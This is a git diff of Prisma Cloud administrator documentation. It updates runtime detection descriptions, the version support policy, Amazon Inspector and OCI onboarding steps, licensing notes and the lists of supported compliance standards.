* Enable and disable this detection via the *Processes started with SUID* toggle, under the Runtime rule Processes tab. @@ -325,7 +325,7 @@ Hosts |Explicitly Denied Listening Port |Indicates a container process is listening on a port that is explicitly listed in the *Listening ports* list, under *Denied & fallback*. -For App-embedded and Serverless, this indicates ports that are not listed in the Allowed Listening ports list. +For App-embedded, this indicates ports that are not listed in the Allowed Listening ports list, or they are on the denied list. |Process is listening on port explicitly denied by a runtime rule @@ -338,7 +338,7 @@ App-embedded |Explicitly Denied Outbound Port |Indicates a container process uses an outbound port that is explicitly listed in the *Outbound internet ports* list under *Denied & fallback*. -For App-embedded and Serverless, this indicates ports that are not listed in the *Outbound ports* list under *Allowed*. +For App-embedded, this indicates ports that are not listed in the *Outbound ports* list under *Allowed*, or they are on the denied list. |Outbound connection to port (IP: ) is explicitly denied by a runtime rule. @@ -425,7 +425,7 @@ Containers, App-Embedded |SSH Access -|Indicates that a ssh config file was accessed +|Indicates that an ssh config file was accessed * Enable and disable this detection via the *Changes to SSH and admin account configuration files* toggle, under the Container/App-Embedded Runtime rule's File system tab. * To ignore such a detection for a known and allowed process, create a Runtime custom rule that allows these file changes by a specific process. 
@@ -537,7 +537,7 @@ App-Embedded To enable or disable WildFire: * Open the *Manage > system > WildFire* page and configure the desired settings -* Open the Runtime rule for Containers, Hosts, or App-Embedded, and enable/disable the *Use WildFire malware analysis*, under the Anti-malware tab +* Open the Runtime rule for Containers, Hosts, or App-Embedded, and enable/disable *Use WildFire malware analysis*. For Container/Host policy, this option is available under *Anti-malware* tab and for App-Embedded policy it's available under *File system* tab. |Process created the file with MD5 . The file created was detected as malicious. Report URL: |xref:incident_types/malware.adoc[Malware] diff --git a/compute/admin_guide/upgrade/support_lifecycle.adoc b/compute/admin_guide/upgrade/support_lifecycle.adoc index 5b9deafcc..30c595db3 100644 --- a/compute/admin_guide/upgrade/support_lifecycle.adoc +++ b/compute/admin_guide/upgrade/support_lifecycle.adoc @@ -9,18 +9,18 @@ With this capability, you have a larger window to plan upgrades for connected co Any supported version of Defender, twistcli, and the Jenkins plugin can connect to Console. Prisma Cloud supports the latest release and the previous two releases (n, n-1, and n-2). -*There are some exceptions to this policy as we roll out this new capability.* +*There are some exceptions to this policy as explained here.* For Defenders: * 21.08 supports n and n-1 (21.04) only. -* Starting with the next release (Joule), there will be full support for n, n-1, and n-2. +* 22.01 and later supports n, n-1, and n-2. For twistcli and the Jenkins plugin: * 21.08 supports itself (n) only. -* In the next release (Joule), Console will support n and n-1. -* In release after Joule (Kepler), Console will support n, n-1, n-2. +* 22.01 (Joule), Console support is for n and n-1. +* 22.06 and later (Kepler and later), Console support is for n, n-1, n-2. 
For example, if Console runs version 21.12, it will support Defenders, twistcli, and the Jenkins plugin running either version 21.08 or 21.04: diff --git a/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png b/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png index 6b2746e06..08e7451f8 100644 Binary files a/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png and b/cspm/admin-guide/_graphics/iam-security-module-30-day-trial.png differ diff --git a/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc b/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc index 83331294a..c803be3e5 100644 --- a/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc +++ b/cspm/admin-guide/configure-external-integrations-on-prisma-cloud/integrate-prisma-cloud-with-aws-inspector.adoc @@ -1,25 +1,25 @@ :topic_type: task [.task] [#id61f76ceb-9311-4af0-b3f8-58ff6598c822] -== Integrate Prisma Cloud with AWS Inspector -Learn how to integrate Prisma™ Cloud with AWS Inspector. +== Integrate Prisma Cloud with Amazon Inspector +Learn how to integrate Prisma™ Cloud with Amazon Inspector. -Prisma™ Cloud ingests vulnerability data and security best practices deviations from AWS Inspector to provide organizations with additional context about risks in the cloud. +Prisma™ Cloud ingests vulnerability data and security best practices deviations from Amazon Inspector to provide organizations with additional context about risks in the cloud. You can identify suspicious traffic to sensitive workloads, such as databases with known vulnerabilities. [.procedure] -. Enable AWS Inspector on your EC2 instances. To set up AWS Inspector, see https://aws.amazon.com/premiumsupport/knowledge-center/set-up-amazon-inspector/[Amazon documentation]. +. Enable Amazon Inspector on your EC2 instances. To set up Amazon Inspector, see https://aws.amazon.com/premiumsupport/knowledge-center/set-up-amazon-inspector/[Amazon documentation]. -. Enable read-access permissions to AWS Inspector on the IAM Role policy. +. Enable read-access permissions to Amazon Inspector on the IAM Role policy. + The Prisma Cloud IAM Role policy that you use to onboard your AWS setup needs these permissions: + -screen:[inspector:Describe*, ] screen:[inspector:List*]If you used the CFT templates to onboard your AWS account, the Prisma Cloud IAM Role policy already has the permissions required for AWS Inspector. +screen:[inspector:Describe*, ] screen:[inspector:List*] If you used the CFT templates to onboard your AWS account, the Prisma Cloud IAM Role policy already has the permissions required for Amazon Inspector. -. After the Prisma Cloud service begins ingesting AWS Inspector data, you can use the following RQL queries for visibility into the host vulnerability information collected from AWS Inspector. +. After the Prisma Cloud service begins ingesting Amazon Inspector data, you can use the following RQL queries for visibility into the host vulnerability information collected from it.
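For illustration, an RQL config query of the following shape can surface resources with Inspector findings; the exact `finding.type` values are an assumption and may differ in your tenant:

```
config from cloud.resource where cloud.type = 'aws' AND finding.type IN ( 'AWS Inspector Runtime Behavior Analysis' , 'AWS Inspector Security Best Practices' )
```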
+ image::inspector-query-on-prisma-cloud.png[scale=40] + diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc index 921f1d7cc..a7e04a982 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/cloud-service-provider-regions-on-prisma-cloud.adoc @@ -47,6 +47,9 @@ View the list of all cloud regions supported on Prisma Cloud. |ap-south-1 |AWS Mumbai +|ap-south-2 +|AWS Hyderabad + |ap-southeast-1 |AWS Singapore diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc index 8784bafe4..8bea17a16 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-aws-account/configure-vulnerability-findings.adoc @@ -3,7 +3,7 @@ == Configure Vulnerability Findings -Prisma Cloud ingests findings and vulnerability data from AWS GuardDuty and Inspector, which you can use to build more meaningful insights and for vulnerability management of potentially compromised resources. Once you enable malware protection and configure it on Prisma Cloud, if malware is detected during a scan, an additional finding is generated that you can view on Prisma Cloud Resource page. +Prisma Cloud ingests findings and vulnerability data from Amazon GuardDuty and Inspector, which you can use to build more meaningful insights and for vulnerability management of potentially compromised resources. 
Once you enable malware protection and configure it on Prisma Cloud, if malware is detected during a scan, an additional finding is generated that you can view on the Prisma Cloud Resource page. [NOTE] ==== diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc index 86e70e420..ba2f6ae78 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc @@ -37,19 +37,19 @@ image::oci-tenant-console-1.png[scale=40] .. Return to the Prisma Cloud Onboarding Setup page and paste the OCID in the *Tenant/Root OCID* field. -.. Select the *Home Region* where the tenant is created (for example, us-phoenix-1). +.. Select the *Home Region* where the tenant is created (for example, us-phoenix-1) and click *Next*. -.. On clicking *Next* and following the steps listed in *Create a User to Enable Access*, a new user, group, and policy that correspond to OCI Identity User Name, Group Name, and Policy Name will be created. +.. Follow the steps in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access] to create a new user, group, and policy that correspond to OCI Identity User Name, Group Name, and Policy Name. + [NOTE] ==== -You can use an existing user with the correct privileges, an existing group, and an existing policy with the correct policy statements. However, it is recommended that you create a new user, group, and policy as described in *Create a User to Enable Access*. +You can use an existing user with the correct privileges, an existing group, and an existing policy with the correct policy statements.
However, it is recommended that you create a new user, group, and policy as described in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access] ==== + image::oci-onboard-setup-2.png[scale=40] -. *Create a User to Enable Access* +. [[create-a-user]]*Create a User to Enable Access* + Use the Terraform template to generate a new user OCID. The User Name, Group Name, and Policy Name must be unique and should not be present in your OCI tenant. + @@ -61,11 +61,6 @@ To onboard the Oracle Cloud account, a public key is needed to access the OCI AP ==== + image::oci-onboard-setup-6.png[scale=40] -+ -//RLP-88811 -*OCI has a limit of 50 policy statements. However, Prisma Cloud supports more than 100 policy statements and contains 56 policy statements in the Terraform file. To successfully ingest the necessary OCI APIs, request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] on the policy statements before running the Terraform file. This change affects monthly or annual universal credits OCI accounts and pay-as-you-go or promo OCI accounts.* -+ -*After receiving the service limit increase on the policy statements, you can manually add the remaining permissions to the Terraform file. For the remaining permissions, see https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/oci-permissions.txt#[OCI Permissions].* .. Check the OCI console to see if the *Primary email address required* checkbox is disabled. @@ -196,7 +191,7 @@ image::oci-investigate-1.png[scale=40] image::oci-pc-policy-1.png[scale=25] -. *Update an Onboarded OCI Account* +. 
[[update-oci-onboard]]*Update an Onboarded OCI Account* //RLP-89018 + To update the permissions of an already onboarded OCI account to ingest new APIs or to ingest additional attributes in the OCI API: @@ -210,11 +205,6 @@ To update the permissions of an already onboarded OCI account to ingest new APIs + image::oci-onboard-setup-8.png[scale=40] -.. Edit the downloaded Terraform template to manually add the remaining permissions after receiving the service limit increase on the policy statements. -+ -For the remaining permissions, see https://docs.paloaltonetworks.com/content/dam/techdocs/en_US/pdf/prisma/prisma-cloud/prerelease/oci-permissions.txt#[OCI Permissions]. - - .. Log in to your OCI tenant console. .. Navigate to "Developer Services > Resource Manager > Stacks". @@ -225,7 +215,7 @@ image::update-oci-onboarding-stack-edit.png[scale=40] + [NOTE] ==== -If you are unable to find the stack to Edit, you must delete the existing user, group, and policy from OCI console and perform the steps in Create a User to Enable Access. +If you are unable to find the stack to Edit, you must delete the existing user, group, and policy from OCI console and perform the steps in xref:id5ac2883d-d1ed-44a3-bd63-cc3fabedf477/create-a-user[Create a User to Enable Access]. ==== .. Select "Edit > Edit Stack", upload the updated Terraform template and click *Next*. @@ -236,4 +226,4 @@ If you are unable to find the stack to Edit, you must delete the existing user, .. From the current Job details, navigate to "Resources > Outputs", copy user_ocid, and add it to Prisma Cloud. + -This will update the policy with the newly added policy statements. \ No newline at end of file +This will update the policy with the newly added policy statements. 
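For context, each of the policy statements referenced in these steps is a single line of OCI IAM policy syntax; the group name below is illustrative, not the one generated by the Terraform template:

```
Allow group PrismaCloudGroup to read all-resources in tenancy
Allow group PrismaCloudGroup to inspect compartments in tenancy
```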
diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc index 9eb84b663..75b68fc04 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/oci-apis-ingested-by-prisma-cloud.adoc @@ -3,9 +3,17 @@ List of all the OCI APIs and their permissions that Prisma Cloud supports for your OCI-related resources. +[NOTE] +==== +It is recommended that you update your existing Terraform template to support the new permissions. This new Terraform template update eliminates the need to contact OCI to request a service limit extension for the policy statements. +==== + //The source file is https://drive.google.com/drive/folders/166udI14uUm2Q7r9AhtL6vRkEYwqZAkKN + [format=csv, options="header"] |=== include::https://docs.google.com/spreadsheets/d/16CfiUwf82IYfCg-RIVhN5y0hpNgglgduHbnXLogvUZ8/pub?output=csv&gid=821695257[] + + |=== \ No newline at end of file diff --git a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc index a93e7ab0e..d1ab24e86 100644 --- a/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc +++ b/cspm/admin-guide/connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/permissions-required-for-oci-tenant-on-prisma-cloud.adoc @@ -8,7 +8,7 @@ Prisma Cloud uses the Terraform file to create a group and add a user to the gro [NOTE] ==== -OCI has a limit of 50 
policy statements. However, Prisma Cloud supports more than 100 policy statements. The Terraform file will include only 56 policy statements, and you must add the remaining permissions manually to the file. To successfully ingest the remaining OCI APIs, request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] on the policy statements before running the Terraform file. This change affects monthly or annual universal credits OCI accounts and pay-as-you-go or promotional OCI accounts. +OCI has a limit of 50 policy statements that can be added to a single IAM policy, but Prisma Cloud supports over 100 policy statements. To successfully ingest all of the OCI APIs, you do not need to request a https://docs.oracle.com/en-us/iaas/Content/General/Concepts/servicelimits.htm#[service limit increase] from OCI on the policy statements. However, you must update your existing Terraform file as outlined in Step 7 in xref:../../connect-your-cloud-platform-to-prisma-cloud/onboard-your-oci-account/add-oci-tenant-to-prisma-cloud.adoc[Update an Onboarded OCI Account]. ==== diff --git a/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc b/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc index 5b444888b..d4093c79a 100644 --- a/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc +++ b/cspm/admin-guide/get-started-with-prisma-cloud/access-prisma-cloud.adoc @@ -18,7 +18,7 @@ If you are using a third-party IdP and the login URL is configured on Prisma Clo [.procedure] . Launch a web browser to access Prisma Cloud. + -Go to the Pal o Alto Networks https://apps.paloaltonetworks.com[hub] to access the app. To access the Prisma Cloud administrator console, Chrome version 72 or later provides the optimal user experience. 
The Prisma Cloud console is not explicitly tested on other browsers and, though we expect it to perform with graceful degradation, it is not guaranteed to work on other browsers. +Go to the Palo Alto Networks https://apps.paloaltonetworks.com[hub] to access the app. To access the Prisma Cloud administrator console, Chrome version 72 or later provides the optimal user experience. The Prisma Cloud console is not explicitly tested on other browsers and, though we expect it to perform with graceful degradation, it is not guaranteed to work on other browsers. + image::prisma-cloud-on-hub.png[scale=60] + diff --git a/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc b/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc index 0b339970f..37cae0da1 100644 --- a/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc +++ b/cspm/admin-guide/get-started-with-prisma-cloud/prisma-cloud-licenses.adoc @@ -36,6 +36,8 @@ Each of these offerings has a different capacity unit and unit price in Prisma C === License and Consumption Details On the Prisma Cloud administrative console *Settings > Licensing*, you can easily view your active license plan, the average credit consumption trend, and details on how the average credits are being used by cloud type and each cloud account. + +Only resources that are active (or running) count towards Prisma Cloud credit usage. Non-active (or dormant) resources do not count towards credit usage. //You can also request to switch from and into the standard a la carte plan, Runtime Security Foundations, or Runtime Security Advanced plan. 
image::licensing-fy23.gif[scale=30] diff --git a/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc b/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc index b5404c8dd..8df09b041 100644 --- a/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc +++ b/cspm/admin-guide/prisma-cloud-compliance/compliance-dashboard.adoc @@ -17,23 +17,23 @@ The built-in regulatory compliance standards that Prisma Cloud supports are: |AWS -|APRA CPS 234, Brazilian Data Protection Law (LGPD), CIS AWS 3 Tier Arch v1.0, CCPA 2018, CIS v1.2, CIS v1.3, CIS AWS v.1.4, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4.2, HIPAA, ISO 27001:2013, MAS TRM 2021, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST 800-171 Rev1, NIST SP 800-171 Rev2, NIST SP 800-172, NIST 800-53 Rev5, NIST CSF v1.1, PCI DSS v3.2, PIPEDA, Monetary Authority of Singapore (MAS) Technology Risk Management (TRM), Risk Management in Technology (RMiT), SOC 2, AWS well architected framework, CyberSecurity Law of the People's Republic of China, CIS AWS 3 Tier Arch v1.0, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), New York Department of Financial Services (NYDFS) 23 Codes, Rules and Regulations (Part 500), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v.9.6.0, Korea–Information Security Management System (K-ISMS), FedRAMP Moderate and Low Baselines (800-53 R4), CIS 
Amazon Web Services Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), AWS Foundational Security Best Practices, CSA CCM v.4.0.6, ISO 27002:2022 +|APRA CPS 234, Brazilian Data Protection Law (LGPD), CIS AWS 3 Tier Arch v1.0, CCPA 2018, CIS v1.2, CIS v1.3, CIS AWS v.1.4, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4.2, HIPAA, ISO 27001:2013, MAS TRM 2021, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST 800-171 Rev1, NIST SP 800-171 Rev2, NIST SP 800-172, NIST 800-53 Rev5, NIST CSF v1.1, PCI DSS v3.2, PIPEDA, Monetary Authority of Singapore (MAS) Technology Risk Management (TRM), Risk Management in Technology (RMiT), SOC 2, AWS well architected framework, CyberSecurity Law of the People's Republic of China, CIS AWS 3 Tier Arch v1.0, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), New York Department of Financial Services (NYDFS) 23 Codes, Rules and Regulations (Part 500), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v.9.6.0, Korea–Information Security Management System (K-ISMS), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Amazon Web Services Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), AWS Foundational Security Best Practices, CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Azure -|Azure Security Benchmark (ASB) v2, APRA CPS 234, Brazilian Data 
Protection Law (LGPD), CCPA 2018, CIS v1.1, CIS v1.2, CIS v1.3, CIS v1.3.1, CIS v1.4.0, CMMC, CSA CCM v3.0.1, CSA CCM v4.0.1, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight< CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Microsoft Azure Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|Azure Security Benchmark (ASB) v2, Azure Security Benchmark (ASB) v3, APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.1, CIS v1.2, CIS v1.3, CIS v1.3.1, CIS v1.4.0, CMMC, CSA CCM v3.0.1, CSA CCM v4.0.1, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information 
Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), CIS Microsoft Azure Foundations Benchmark (v1.5.0), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |GCP -|APRA CPS 234, Brazilian Data Protection Law (LGPD), CCPA 2018, CIS v1.0, CIS v.1.1, CIS v.1.2, CIS GKE v1.1, CSA CCM v3.0.1, CSA CCM v4.0.1, CMMC, GDPR, HITRUST v9.3, HITRUST v9.4, HIPAA, ISO 27001:2013, MITRE ATT&CKv6.3, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST 800.53 R4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2,
NIST SP 800-172, PCI DSS v3.2, PIPEDA, SOC 2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Google Cloud Platform Foundation Benchmark v1.3.0, CIS Google Kubernetes Engine (GKE) v1.2.0 and v1.3.0, FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, CIS Google Cloud Platform Foundation Benchmark v2.0.2, CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Alibaba -|Brazilian Data Protection Law (LGPD), CIS v1.0.0, CMMC, CSA CCM v4.0.1, HITRUST v9.3, MAS TRM 2021, MPAA Content Protection Best Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, MITRE ATT&CKv8.2, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, MAS TRM, RMiT, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|Brazilian Data Protection Law (LGPD), CIS v1.0.0, CMMC, CSA CCM v4.0.1, HITRUST v9.3, MAS TRM 2021, MPAA Content Protection Best 
Practice v4.08, Multi-Level Protection Scheme (MLPS) v2.0, MITRE ATT&CKv8.2, NIST 800.53 Rev4, NIST 800-53 Rev5, NIST CSF v1.1, NIST SP 800-171 Rev2, NIST SP 800-172, PCI DSS v3.2, MAS TRM, RMiT, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), FedRAMP Moderate and Low Baselines (800-53 R4), SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |Oracle Cloud Infrastructure -|CIS v1.0, CIS v1.1, CSA CCM v4.0.1, HITRUST v9.4, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST SP 800-171 Rev2, NIST SP 800-172, NIST CSF v1.1, PCI DSS v3.2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Oracle Cloud Infrastructure Foundations Benchmark v1.2.0, SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022 +|CIS v1.0, CIS v1.1, CSA CCM v4.0.1, HITRUST v9.4, MITRE ATT&CKv8.2, MPAA Content Protection Best Practice v4.08, NIST SP 800-171 Rev2, NIST SP 800-172, NIST CSF v1.1, PCI DSS v3.2, ISO/IEC 27002:2013, ISO/IEC 
27018:2019, ISO/IEC 27017:2015, MITRE ATT&CK v10.0, New Zealand Information Security Manual (NZISM) v3.4, Australian Energy Sector Cyber Security Framework (AESCSF), Australian Cyber Security Centre (ACSC) Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, CIS Critical Security Controls (CIS CSC) V7.1, CIS CSC V8, Federal Financial Institutions Examination Council (FFIEC), Payment Card Industry Data Security Standard (PCI DSS v4.0), CIS Oracle Cloud Infrastructure Foundations Benchmark v1.2.0, SCF 2022.2.1, MLPS 2.0 (Level 2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2022 |=== To help you easily identify the gaps and measure how you’re doing against the benchmarks defined in the governance and compliance frameworks, the Compliance Dashboard (menu:Compliance[Overview] combines rich visuals with an interactive design. The dashboard results include data for the last full hour. The timestamp on the bottom right corner of the screen indicates when the data was aggregated for the results displayed. 
